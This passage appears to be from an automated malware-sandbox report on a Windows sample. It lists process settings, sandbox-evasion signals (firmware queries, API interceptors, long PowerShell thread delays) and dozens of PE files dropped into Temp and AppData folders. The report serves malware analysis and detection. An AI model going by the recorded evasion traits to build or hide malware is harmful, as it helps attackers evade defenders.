                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com; System information queried: FirmwareTableInformation
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 596876E2
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 5954891D
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 5968CCA4
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 596760AA
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 595F5694
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 5957B62E
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 596037FE
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 596D16A6
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 596AF56B
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 59733DCC
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe; API/Special instruction interceptor: Address: 76F17C44
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3463
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6354
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UninstallFanCtrlSvcLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LB16K.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-CCHIR.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-4L189.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O6NPJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BIPBA.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MB90D.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56DJF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1d.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QPNLV.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Sql.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Uninstaller.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RGA67.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-03H4T.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\windowplugin.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1BB9P.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LLMGF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QM6QO.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HA2SV.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140d.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IOD6F.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3_ttf.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q7DQ7.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\USBInfoLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-OGG5H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-87NKD.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IR9SP.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libssl-1_1-x64.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UserExperienceImprovementPlugin.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGAManufacturerLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BHL7J.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ti_managers_proxy_stub.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8VJ6H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EVHCR.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9EE7H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140_1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Steam2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-N2CN3.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NEQ1G.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9SPC4.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I6BL7.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KH84M.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-U43LQ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-AOFIL.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9IN29.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libusb-1.0.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EQNNJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-D20BS.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DUCDE.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UADI4.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libcrypto-1_1-x64.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGATypeLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-TCI75.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9K44C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RHD94.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Svg.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56B19.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ServiceUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NMS81.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O945R.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-JPD1F.tmpJump to dropped file
